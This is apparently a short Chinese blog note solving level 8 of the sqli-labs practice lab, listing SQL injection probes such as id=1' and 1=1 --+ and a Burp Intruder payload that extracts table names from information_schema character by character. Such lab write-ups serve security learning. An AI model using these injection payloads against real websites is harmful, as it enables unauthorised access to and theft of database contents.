sqllab第八关通关笔记

知识点:

  • 这里感觉是一个单纯的单引号绕过
  • bp爆破配置的条件和第七关一样

首先判断注入类型

构造id=1/0

回显成功

构造id=1'

错误回显,感觉又是一个单引号绕过

构造id=1''

正常回显了,说明不错,就是一个单引号绕过

构造payload:id=1' and 1=1 --+

正常回显,绝杀了

利用数据库名再试一下

构造id=1' and database()='security' --+

成功回显

接下来就是利用bp进行爆破了;设置和上一关一样

构造的payload:id=1%27+and+mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),§1§,1)=%27§e§%27--+

对相关设置进行配置;和第七关一样的爆破配置;最后也是需要进行过滤的;虽然这里的长度是不一样的,但是直接利用过滤和排序获取的信息更加的规整好看

10

相关推荐
qq_24218863328 分钟前
金融AI反欺诈系统构建指南
人工智能·笔记·金融·课程设计
四谎真好看21 分钟前
SSM学习笔记(SpringBoot篇)
spring boot·笔记·学习·学习笔记·ssm
宇木灵1 小时前
考研数学-高中数学回顾函数的微分day8(完结)
笔记·学习·考研·数学·函数·导数·微分
一个人旅程~1 小时前
《七重时间的织锦》-致初七
windows·经验分享·笔记·微信公众平台
今儿敲了吗2 小时前
28| A-B数对
数据结构·c++·笔记·学习·算法
摇滚侠2 小时前
RocketMQ 教程丨深度掌握 MQ 消息中间件,笔记 39-44
笔记·rocketmq
月下雨(Moonlit Rain)2 小时前
数据库笔记
数据库·笔记
今儿敲了吗2 小时前
27| 魔法封印
数据结构·c++·笔记·学习·算法
桂花很香,旭很美2 小时前
Anthropic Agent 工程实战笔记(四)长任务与多 Agent
笔记·架构·agent
今儿敲了吗2 小时前
30| 木材加工
数据结构·c++·笔记·学习·算法